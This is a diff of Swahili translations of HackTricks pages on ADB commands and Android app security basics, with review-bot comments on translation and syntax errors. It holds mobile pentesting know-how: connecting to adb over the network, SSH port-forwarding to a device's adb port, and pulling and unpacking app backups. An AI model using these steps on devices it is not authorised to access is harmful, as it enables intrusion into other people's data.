@ -1,19 +1,20 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
**Adb kawaida iko katika:**
**Adb kwa kawaida hupatikana katika:**
```bash
#Windows
C:\Users\<username>\AppData\Local\Android\sdk\platform-tools\adb.exe
@ -21,31 +22,31 @@ C:\Users\<username>\AppData\Local\Android\sdk\platform-tools\adb.exe
#MacOS
/Users/<username>/Library/Android/sdk/platform-tools/adb
```
**Maelezo yaliyopatikana kutoka:** [**http://adbshell.com/**](http://adbshell.com)
**Taarifa zilizopatikana kutoka:** [**http://adbshell.com/**](http://adbshell.com)
# Uunganisho
# Muunganisho
```
adb devices
```
Hii itaorodhesha vifaa vilivyounganishwa; ikiwa "_**unathorised**_" inaonekana, hii inamaanisha kuwa unahitaji **kuondoa kizuizi** kwenye **simu yako** na **kukubali** uunganisho.
Hii itataja vifaa vilivyounganishwa; ikiwa "_**isiyothibitishwa**_" inaonekana, hii inamaanisha kwamba unapaswa **kuondoa kizuizi** kwenye **simu** yako na **kukubali** muunganisho.
Hii inaashiria kifaa kuwa kinapaswa kuanza adb server kwenye bandari 5555:
Hii inaashiria kwa kifaa kwamba kinapaswa kuanzisha na adb server kwenye bandari 5555:
```
adb tcpip 5555
```
Weka uhusiano na anwani hiyo ya IP na hiyo Port:
Unganisha kwenye IP hiyo na Bandari hiyo:
```
adb connect <IP>:<PORT>
```
Ikiwa unapata kosa kama ifuatavyo katika programu ya Android ya Virtual (kama Genymotion):
Ikiwa unapata kosa kama ifuatavyo katika programu ya Virtual Android (kama Genymotion):
```
adb server version (41) doesn't match this client (36); killing...
```
Ni kwa sababu unajaribu kuunganisha kwenye seva ya ADB na toleo tofauti. Jaribu tu kupata faili ya adb binary ambayo programu inatumia (enda kwenye `C:\Program Files\Genymobile\Genymotion` na tafuta adb.exe)
Ni kwa sababu unajaribu kuungana na seva ya ADB yenye toleo tofauti. Jaribu tu kutafuta binary ya adb ambayo programu inatumia (nenda kwenye `C:\Program Files\Genymobile\Genymotion` na tafuta adb.exe)
## Vifaa vingi
Unapopata **vifaa vingi vilivyounganishwa kwenye kompyuta yako**, utahitaji **kutaja kwenye kifaa kipi** unataka kuendesha amri ya adb.
Wakati wowote unapata **vifaa vingi vimeunganishwa kwenye mashine yako** utahitaji **kueleza ni kipi** unachotaka kutumia kuendesha amri ya adb.
```bash
adb devices
List of devices attached
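Review bot: The new line translates the adb status string to `isiyothibitishwa`; that string is program output the reader has to match against what `adb devices` prints, so it should stay untranslated (and the original `unathorised` spelling is itself off; adb prints `unauthorized`). The phrase `kinapaswa kuanzisha na adb server kwenye bandari 5555` is also awkward ("should start with an adb server"); the removed wording `kuanza adb server kwenye bandari 5555` was clearer.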
@ -60,16 +61,16 @@ root
```
## Port Tunneling
Katika kesi ambapo **adb** **port** inaweza kufikiwa tu kutoka **localhost** kwenye kifaa cha Android lakini **una ufikiaji kupitia SSH**, unaweza **kuhamisha** **port 5555** na kuunganisha kupitia adb:
Ikiwa **adb** **bandari** inapatikana tu kutoka **localhost** kwenye kifaa cha android lakini **una ufikiaji kupitia SSH**, unaweza **kupeleka bandari 5555** na kuungana kupitia adb:
```bash
ssh -i ssh_key username@10.10.10.10 -L 5555:127.0.0.1:5555 -p 2222
adb connect 127.0.0.1:5555
```
# Meneja wa Pakiti
# Packet Manager
## Sakinisha/Ondoa
## Install/Uninstall
### adb install \[chaguo] \<njia>
### adb install \[option] \<path>
```bash
adb install test.apk
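Review bot: the new heading "# Packet Manager" is a typo for the Android package manager (`pm`), which is what the install/uninstall and `pm list packages` commands below drive; the previous "Meneja wa Pakiti" was correct. Either keep that heading or use "Package Manager", and apply one convention to the other headings this commit switches from Swahili to English ("Install/Uninstall", "Packages") so the file does not mix languages heading by heading.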
@ -85,23 +86,17 @@ adb install -d test.apk # allow version code downgrade
adb install -p test.apk # partial application install
```
### adb uninstall \[chaguo] \<PAKETI>
- **Maelezo**: Amri hii inatumika kuondoa programu ya Android kutoka kifaa cha lengo.
- **Chaguo**:
- `-k`: Ongeza chaguo hili ili kuweka data na hifadhidata ya programu baada ya kuiondoa.
- `-r`: Ongeza chaguo hili ili kuondoa programu ya mfumo ambayo imesakinishwa kwenye kifaa cha lengo.
- **Mfano**: `adb uninstall com.example.app`
### adb uninstall \[options] \<PACKAGE>
```bash
adb uninstall com.test.app
adb uninstall -k com.test.app Keep the data and cache directories around after package removal.
```
## Pakiti
## Packages
Inaonyesha pakiti zote, kwa hiari tu zile ambazo jina la pakiti linajumuisha maandishi katika \<FILTER>.
Inachapisha pakiti zote, kwa hiari zile tu ambazo jina la pakiti lina maandiko katika \<FILTER>.
### adb shell pm list packages \[chaguo] \<FILTER-STR>
### adb shell pm list packages \[options] \<FILTER-STR>
```bash
adb shell pm list packages <FILTER-STR>
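Review bot: dropping the option list that documented a `-r` flag for `adb uninstall` (removing a system app) is correct, since `adb uninstall` only accepts `-k` and that line was misleading. On the remaining code line, "Keep the data and cache directories around after package removal." follows the command with no `#`, so a copy-paste would pass those words as extra arguments; prefix the description with `#`.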
@ -123,41 +118,41 @@ adb shell pm list packages --user <USER_ID> <FILTER-STR> #The user space to quer
```
### adb shell pm path \<PACKAGE>
Chapisha njia ya APK ya .
Chapisha njia ya APK ya iliyotolewa.
```bash
adb shell pm path com.android.phone
```
### adb shell pm clear \<PACKAGE>
Futa data zote zinazohusiana na pakiti.
Futa data zote zinazohusiana na kifurushi.
```bash
adb shell pm clear com.test.abc
```
# Meneja wa Faili
# File Manager
### adb pull \<remote> \[local]
Pakua faili iliyotajwa kutoka kwenye kifaa/emulator hadi kwenye kompyuta yako.
Pakua faili maalum kutoka kwa emulator/kifaa hadi kwenye kompyuta yako.
```bash
adb pull /sdcard/demo.mp4 ./
```
### adb push \<local> \<remote>
Pakia faili iliyotajwa kutoka kwenye kompyuta yako kwenda kwenye kifaa/emulator.
Pakia faili maalum kutoka kwa kompyuta yako hadi emulators/kipande.
```bash
adb push test.apk /sdcard
```
# Kuchukua Picha ya Skrini/Rekodi ya Skrini
# Screencapture/Screenrecord
### adb shell screencap \<jina la faili>
### adb shell screencap \<filename>
Kuchukua picha ya skrini ya kifaa.
Kuchukua picha ya skrini ya onyesho la kifaa.
```bash
adb shell screencap /sdcard/screen.png
```
### adb shell screenrecord \[chaguo] \<jina la faili>
### adb shell screenrecord \[options] \<filename>
Kurekodi skrini ya vifaa vinavyotumia Android 4.4 (kiwango cha API 19) na zaidi.
Kurekodi onyesho la vifaa vinavyotumia Android 4.4 (API level 19) na juu.
```bash
adb shell screenrecord /sdcard/demo.mp4
adb shell screenrecord --size <WIDTHxHEIGHT>
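Review bot: in the `adb push` description, "emulators/kipande" mistranslates "emulator/device": "kipande" means a piece or fragment, while the old line's "kifaa" was right, so use "emulator/kifaa". Less important, "Chapisha njia ya APK ya iliyotolewa" is missing its noun ("ya kifurushi kilichotolewa", the APK path of the given package), and the "File Manager" and "Screencapture/Screenrecord" headings are left in English while the text around them is translated.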
@ -174,7 +169,7 @@ adb shell screenrecord --verbose
### adb shell
Pata kikao ndani ya kifaa
Pata shell ndani ya kifaa
```bash
adb shell
```
@ -186,7 +181,7 @@ adb shell ls
```
## pm
Amri zifuatazo zinatekelezwa ndani ya kikao cha shell
Amri zifuatazo zinafanywa ndani ya shell
```bash
pm list packages #List installed packages
pm path <package name> #Get the path to the apk file of tha package
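Review bot: the unchanged context line `pm path <package name> #Get the path to the apk file of tha package` has a typo ("tha" for "the") that could be fixed while this block is being edited; the rewritten "Amri zifuatazo zinafanywa ndani ya shell" reads fine.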
@ -195,9 +190,9 @@ am startservice [<options>] #Start a service. Whiout options you can see the hel
am broadcast [<options>] #Send a broadcast. Whiout options you can see the help menu
input [text|keyevent] #Send keystrokes to device
```
# Mchakato
# Processes
Ikiwa unataka kupata PID ya mchakato wa programu yako, unaweza kutekeleza:
Ikiwa unataka kupata PID ya mchakato wa programu yako unaweza kutekeleza:
```bash
adb shell ps
```
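Review bot: both `am` comments in this block ("Whiout options you can see the help menu", on the `am startservice` and `am broadcast` lines) misspell "Without"; since the translation pass is already rewriting neighbouring lines, fix those comments too so the block is consistent.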
@ -207,37 +202,32 @@ Au unaweza kufanya
```bash
adb shell pidof com.your.application
```
Na itaandika PID ya programu
Na itachapisha PID ya programu
# System
```bash
adb root
```
Hii inaanza tena adbd daemon na ruhusa ya root. Kisha, lazima uunganishe tena kwenye seva ya ADB na utakuwa na ruhusa ya root (ikiwa inapatikana).
Inarestart huduma ya adbd na ruhusa za mzizi. Kisha, unapaswa kuungana tena na seva ya ADB na utakuwa mzizi (ikiwa inapatikana)
```bash
adb sideload <update.zip>
```
# Kurejesha/kuweka upya pakiti za Android update.zip.
flashing/restoring Android update.zip packages.
# Kumbukumbu
# Logs
## Logcat
Kwa **kuchuja ujumbe wa programu moja tu**, pata PID ya programu na tumia grep (linux/macos) au findstr (windows) kuchuja matokeo ya logcat:
Ili **kuchuja ujumbe wa programu moja tu**, pata PID ya programu na tumia grep (linux/macos) au findstr (windows) kuchuja matokeo ya logcat:
```bash
adb logcat | grep 4526
adb logcat | findstr 4526
```
### adb logcat \[chaguo] \[majaribio-ya-kichujio]
- **chaguo**: Chaguo-msingi cha adb logcat ni *main*. Chaguo zingine ni *radio*, *events*, *system*, *crash*, *kernel*, *all*.
- **majaribio-ya-kichujio**: Unaweza kutumia majaribio ya kichujio ili kuchuja matokeo ya logcat kulingana na vigezo fulani kama *tag*, *priority*, *pid*, *appname*, *message*.
Kwa mfano, unaweza kutumia amri `adb logcat -d | grep "Error"` ili kupata makosa kutoka kwenye logcat.
### adb logcat \[option] \[filter-specs]
```bash
adb logcat
```
Maelezo: bonyeza Ctrl-C ili kusimamisha ufuatiliaji
Notes: bonyeza Ctrl-C kuacha kufuatilia
```bash
adb logcat *:V # lowest priority, filter to only show Verbose level
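Review bot: "ruhusa za mzizi" / "utakuwa mzizi" translates "root" literally (a plant root); the previous text kept "root" as the technical term, which is what a reader looking for `adb root` expects, so keep it untranslated. Also, "flashing/restoring Android update.zip packages." drops the Swahili wording the old line had and is now the only untranslated description in this part of the file. For the PID filter, it is worth adding that on Android 7.0 and later `adb logcat --pid=<PID>` filters on the process id itself, whereas `grep 4526` also matches any log line that happens to contain those digits.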
@ -254,16 +244,6 @@ adb logcat *:F # filter to only show Fatal level
adb logcat *:S # Silent, highest priority, on which nothing is ever printed
```
### adb logcat -b \<Buffer>
Kwa kutumia amri hii, unaweza kusoma na kuchambua magogo ya kifaa cha Android kwa kikundi maalum cha kumbukumbu. Badala ya `<Buffer>`, unaweza kutumia vikundi vifuatavyo:
- `main`: Kumbukumbu kuu ya mfumo wa Android.
- `radio`: Kumbukumbu ya mawasiliano ya simu.
- `events`: Kumbukumbu ya matukio ya mfumo.
- `system`: Kumbukumbu ya magogo ya mfumo.
- `crash`: Kumbukumbu ya magogo ya ajali.
Kwa mfano, unaweza kutumia amri `adb logcat -b main` ili kusoma magogo ya kumbukumbu kuu ya mfumo wa Android.
```bash
adb logcat -b # radio View the buffer that contains radio/telephony related messages.
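Review bot: in `adb logcat -b # radio View the buffer that contains radio/telephony related messages.` the buffer name is placed after the `#`, so the command that actually runs is `adb logcat -b` with no argument and it fails; it should be `adb logcat -b radio # View the buffer that contains radio/telephony related messages.` Removing the duplicated buffer list above the block is fine because the block documents the same buffers, but only if the commands in it are runnable.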
@ -283,9 +263,9 @@ adb logcat -n <count> # Sets the maximum number of rotated logs to <count>.
```
## dumpsys
Inahifadhi data ya mfumo
dumps data za mfumo
### adb shell dumpsys \[chaguo]
### adb shell dumpsys \[options]
```bash
adb shell dumpsys
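Review bot: "dumps data za mfumo" mixes an English verb into the Swahili sentence and starts in lowercase; the previous "Inahifadhi data ya mfumo" was also off (hifadhi means store, not dump), so "Inachapisha data ya mfumo" or "Inatoa (dumps) data ya mfumo" would express what `dumpsys` does.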
@ -293,11 +273,11 @@ adb shell dumpsys meminfo
adb shell dumpsys battery
```
Maelezo: Kifaa cha simu kilicho na Chaguo za Watengenezaji zilizowezeshwa kinachotumia Android 5.0 au zaidi.
Notes: Kifaa cha simu chenye Chaguo za Mwandamizi kimewezeshwa kinachotumia Android 5.0 au juu.
```bash
adb shell dumpsys batterystats collects battery data from your device
```
Maelezo: [Battery Historian](https://github.com/google/battery-historian) hubadilisha data hiyo kuwa taswira ya HTML. **HATUA 1** _adb shell dumpsys batterystats > batterystats.txt_ **HATUA 2** _python historian.py batterystats.txt > batterystats.html_
Notes: [Battery Historian](https://github.com/google/battery-historian) inabadilisha data hiyo kuwa uonyeshaji wa HTML. **STEP 1** _adb shell dumpsys batterystats > batterystats.txt_ **STEP 2** _python historian.py batterystats.txt > batterystats.html_
```bash
adb shell dumpsys batterystats --reset erases old collection data
```
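Review bot: "Chaguo za Mwandamizi" renders "Developer Options" as something like "senior options"; the old "Chaguo za Watengenezaji" carried the meaning (developers), so revert that. In the two code lines, "collects battery data from your device" and "erases old collection data" follow the command with no `#` and would be passed as arguments if pasted; comment them.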
@ -305,7 +285,7 @@ adb shell dumpsys activity
# Backup
Hifadhi kifaa cha Android kutoka kwa adb.
Fanya nakala ya kifaa cha android kutoka adb.
```bash
adb backup [-apk] [-shared] [-system] [-all] -f file.backup
# -apk -- Include APK from Third partie's applications
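Review bot: the unchanged comment "Include APK from Third partie's applications" should read "third-party applications"; the rewritten "Fanya nakala ya kifaa cha android kutoka adb" is fine.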
@ -317,20 +297,21 @@ adb shell pm list packages -f -3 #List packages
adb backup -f myapp_backup.ab -apk com.myapp # backup on one device
adb restore myapp_backup.ab # restore to the same or any other device
```
Ikiwa unataka kukagua maudhui ya nakala rudufu:
Ikiwa unataka kukagua maudhui ya nakala:
```bash
( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 myapp_backup.ab ) | tar xfvz -
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
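Review bot: the extraction one-liner `( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 myapp_backup.ab ) | tar xfvz -` only works for unencrypted backups: it skips the 24-byte `ANDROID BACKUP` text header and prepends a gzip header to the remaining bytes, so if a backup password was set on the device the payload is encrypted and tar fails on it; the sentence above the block should say so. The footer swap to the new "Support HackTricks" block matches the header change at the top of the file.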

View file

@ -1,20 +1,21 @@
# Misingi ya Maombi ya Android
# Msingi wa Maombi ya Android
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kikundi cha Usalama cha Kujaribu Kwa Bidii**
**Kundi la Usalama wa Jaribio la Bidhaa**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
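Review bot: "Kundi la Usalama wa Jaribio la Bidhaa" changes the meaning of the group's name (it now reads roughly "product testing security group"), whereas the previous "Kujaribu Kwa Bidii" kept the sense of "try hard". Since this is the name of a sponsor group that the banner image below refers to, keep it as a proper noun rather than translating it differently in each revision.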
@ -24,137 +25,138 @@ Njia nyingine za kusaidia HackTricks:
## Mfano wa Usalama wa Android
**Kuna safu mbili:**
**Kuna tabaka mbili:**
* **OS**, ambayo inaweka maombi yaliyosanikishwa kando na mwingine.
* **Maombi yenyewe**, ambayo inaruhusu watengenezaji ku **funua baadhi ya utendaji** na kusanidi uwezo wa maombi.
* **OS**, ambayo inashikilia maombi yaliyowekwa mbali na kila mmoja.
* **maombi yenyewe**, ambayo inaruhusu waendelezaji **kuweka wazi kazi fulani** na kuunda uwezo wa maombi.
### Ufafanuzi wa UID
### Kutenganisha UID
**Kila maombi hupewa Kitambulisho cha Mtumiaji maalum**. Hii hufanywa wakati wa usanidi wa programu ili **programu iweze kuingiliana tu na faili zilizomilikiwa na Kitambulisho chake cha Mtumiaji au faili zilizoshirikiwa**. Kwa hivyo, ni programu yenyewe, sehemu fulani za OS na mtumiaji wa msingi tu wanaweza kupata data za programu.
**Kila ombi linapewa Kitambulisho Maalum cha Mtumiaji**. Hii inafanywa wakati wa usakinishaji wa ombi ili **ombile linaweza kuingiliana tu na faili zinazomilikiwa na Kitambulisho chake cha Mtumiaji au faili zilizoshirikiwa**. Hivyo, ni ombi lenyewe tu, vipengele fulani vya OS na mtumiaji wa root wanaweza kufikia data za maombi.
### Kushiriki UID
**Maombi mawili yanaweza kusanidiwa kutumia UID sawa**. Hii inaweza kuwa na manufaa kushiriki habari, lakini ikiwa moja yao itashambuliwa data ya maombi yote mawili itashambuliwa. Ndio maana tabia hii ina **kukataliwa**.\
**Ili kushiriki UID sawa, maombi lazima yatamke thamani sawa ya `android:sharedUserId` katika mizizi yao.**
**Maombi mawili yanaweza kuwekewa mipangilio kutumia UID sawa**. Hii inaweza kuwa na manufaa kushiriki habari, lakini ikiwa moja yao itashambuliwa, data za maombi yote mawili zitakuwa hatarini. Hii ndiyo sababu tabia hii inashauriwa **kuepukwa**.\
**Ili kushiriki UID sawa, maombi lazima yainishe thamani sawa ya `android:sharedUserId` katika hati zao.**
### Sanduku la Kumaliza
### Sandboxing
**Sanduku la Maombi ya Android** inaruhusu kufanya kazi **kila maombi** kama **mchakato tofauti chini ya Kitambulisho cha Mtumiaji tofauti**. Kila mchakato una mashine yake ya kisasa, kwa hivyo msimbo wa programu hufanya kazi kivyake kutoka kwa programu zingine.\
Kuanzia Android 5.0(L) **SELinux** inatekelezwa. Kimsingi, SELinux ilikataa mwingiliano wa mchakato wote na kisha ikatengeneza sera za **kuruhusu mwingiliano uliotarajiwa tu kati yao**.
**Android Application Sandbox** inaruhusu kuendesha **kila ombi** kama **mchakato tofauti chini ya Kitambulisho cha Mtumiaji tofauti**. Kila mchakato una mashine yake ya virtual, hivyo msimbo wa ombi unakimbia kwa kujitenga na maombi mengine.\
Kuanzia Android 5.0(L) **SELinux** inatekelezwa. Kimsingi, SELinux ilikataa mwingiliano wote wa mchakato na kisha kuunda sera za **kuruhusu tu mwingiliano unaotarajiwa kati yao**.
### Ruhusa
Unapoweka **programu na inauliza ruhusa**, programu inauliza ruhusa zilizosanidiwa katika vipengele vya **`uses-permission`** katika faili ya **AndroidManifest.xml**. Kipengele cha **uses-permission** kinaonyesha jina la ruhusa inayohitajika ndani ya **sifa ya jina**. Pia ina sifa ya **maxSdkVersion** ambayo inazuia kuuliza ruhusa kwenye toleo zaidi ya lile lililoelezwa.\
Tambua kwamba maombi ya android hayahitaji kuuliza ruhusa zote mwanzoni, wanaweza pia **kuuliza ruhusa kwa kudhibiti** lakini ruhusa zote lazima zitangazwe katika **mizizi.**
Wakati unaposakinisha **ombile na linaomba ruhusa**, ombi linaomba ruhusa zilizowekwa katika vipengele vya **`uses-permission`** katika faili ya **AndroidManifest.xml**. Kipengele cha **uses-permission** kinaonyesha jina la ruhusa inayohitajika ndani ya **attribute ya jina**. Pia ina **maxSdkVersion** attribute ambayo inakomesha kuomba ruhusa kwenye toleo lililo juu ya lile lililotajwa.\
Kumbuka kwamba maombi ya android hayahitaji kuomba ruhusa zote mwanzoni, yanaweza pia **kuomba ruhusa kwa njia ya kidijitali** lakini ruhusa zote lazima **zitangazwe** katika **manifest**.
Wakati programu inafunua utendaji inaweza kikomo **upatikanaji kwa maombi tu yenye ruhusa iliyosanidiwa**.\
Kipengele cha ruhusa kina sifa tatu:
Wakati ombi linapoweka wazi kazi, linaweza kupunguza **ufikiaji kwa maombi tu ambayo yana ruhusa maalum**.\
Kipengele cha ruhusa kina attributes tatu:
* **Jina** la ruhusa
* Sifa ya **kikundi cha ruhusa**, ambayo inaruhusu kikundi cha ruhusa kinachohusiana.
* **Kiwanja cha ulinzi** ambacho kinaonyesha jinsi ruhusa zinavyotolewa. Kuna aina nne:
* **Kawaida**: Hutumiwa wakati hakuna **tishio lililojulikana** kwa programu. Mtumiaji **hahitajiki kuidhinisha**.
* **Hatari**: Inaonyesha ruhusa inayompa maombi yanayoomba **upatikanaji ulioinuliwa**. **Watumiaji wanahitajika kuidhinisha**.
* **Sahihi**: **Maombi yaliyosainiwa na cheti kile kile** kama lile linaloexport kipengee kinaweza kupewa ruhusa. Hii ni aina yenye nguvu zaidi ya ulinzi.
* **SahihiAuMfumo**: **Maombi yaliyosainiwa na cheti kile kile** kama lile linaloexport kipengee au **maombi yanayotumia upatikanaji wa kiwango cha mfumo** yanaweza kupewa ruhusa
* **jina** la ruhusa
* **attribute ya kundi la ruhusa**, ambayo inaruhusu kuunganisha ruhusa zinazohusiana.
* **kiwango cha ulinzi** ambacho kinaonyesha jinsi ruhusa zinavyotolewa. Kuna aina nne:
* **Kawaida**: Inatumika wakati hakuna **hatari zinazojulikana** kwa ombi. Mtumiaji **huhitajika kuidhinisha**.
* **Hatari**: Inaonyesha ruhusa inatoa ombi linalohitaji ufikiaji **wa juu**. **Watumiaji wanahitajika kuidhinisha**.
* **Sahihi**: Ni **maombi tu yaliyosainiwa na cheti sawa na kile** kinachosafirisha kipengele yanaweza kupewa ruhusa. Hii ndiyo aina yenye nguvu zaidi ya ulinzi.
* **SahihiAuMfumo**: Ni **maombi tu yaliyosainiwa na cheti sawa na kile** kinachosafirisha kipengele au **maombi yanayoendesha kwa ufikiaji wa kiwango cha mfumo** yanaweza kupewa ruhusa.
## Maombi Yaliyosanikishwa Kabla
## Maombi Yaliyosakinishwa Kabla
Maombi haya kwa kawaida hupatikana kwenye saraka za **`/system/app`** au **`/system/priv-app`** na baadhi yao ni **yaliyoboreshwa** (unaweza hata usipate faili ya `classes.dex`). Maombi haya ni muhimu kuangalia kwa sababu mara nyingi yanakuwa **yanaendeshwa na ruhusa nyingi sana** (kama mtumiaji wa msingi).
Maombi haya kwa ujumla hupatikana katika **`/system/app`** au **`/system/priv-app`** directories na baadhi yao yame **boreshwa** (huenda usipate hata faili ya `classes.dex`). Maombi haya yanastahili kuangaliwa kwa sababu wakati mwingine yanaweza kuwa **yanakimbia na ruhusa nyingi sana** (kama root).
* Yaliyotumwa na **AOSP** (Mradi wa Chanzo Wazi wa Android) **ROM**
* Yaliyopewa na **mtengenezaji wa kifaa**
* Yaliyopewa na **mtoa huduma wa simu** (ikiwa imeunuliwa kutoka kwao)
* Yaliyotolewa na **AOSP** (Mradi wa Msource wa Android) **ROM**
* Yaliyoongezwa na **mtengenezaji wa kifaa**
* Yaliyoongezwa na **mtoa huduma wa simu** (ikiwa imenunuliwa kutoka kwao)
## Kuroot
## Rooting
Ili kupata ufikiaji wa msingi kwenye kifaa cha android unahitaji kwa ujumla **kudukua** 1 au 2 **mapungufu** ambayo kwa kawaida huwa **maalum** kwa **kifaa** na **toleo**.\
Baada ya kudukua kufanikiwa, kawaida `su` ya Linux binary hucopishwa kwenye eneo lililoelezwa katika PATH env variable ya mtumiaji kama vile `/system/xbin`.
Ili kupata ufikiaji wa root kwenye kifaa halisi cha android kwa ujumla unahitaji **kufanya matumizi** ya udhaifu 1 au 2 ambayo huwa **maalum** kwa **kifaa** na **toleo**.\
Mara tu udhaifu umefanikiwa, kwa kawaida faili ya `su` ya Linux inakopishwa kwenye eneo lililotajwa katika mabadiliko ya mazingira ya mtumiaji kama `/system/xbin`.
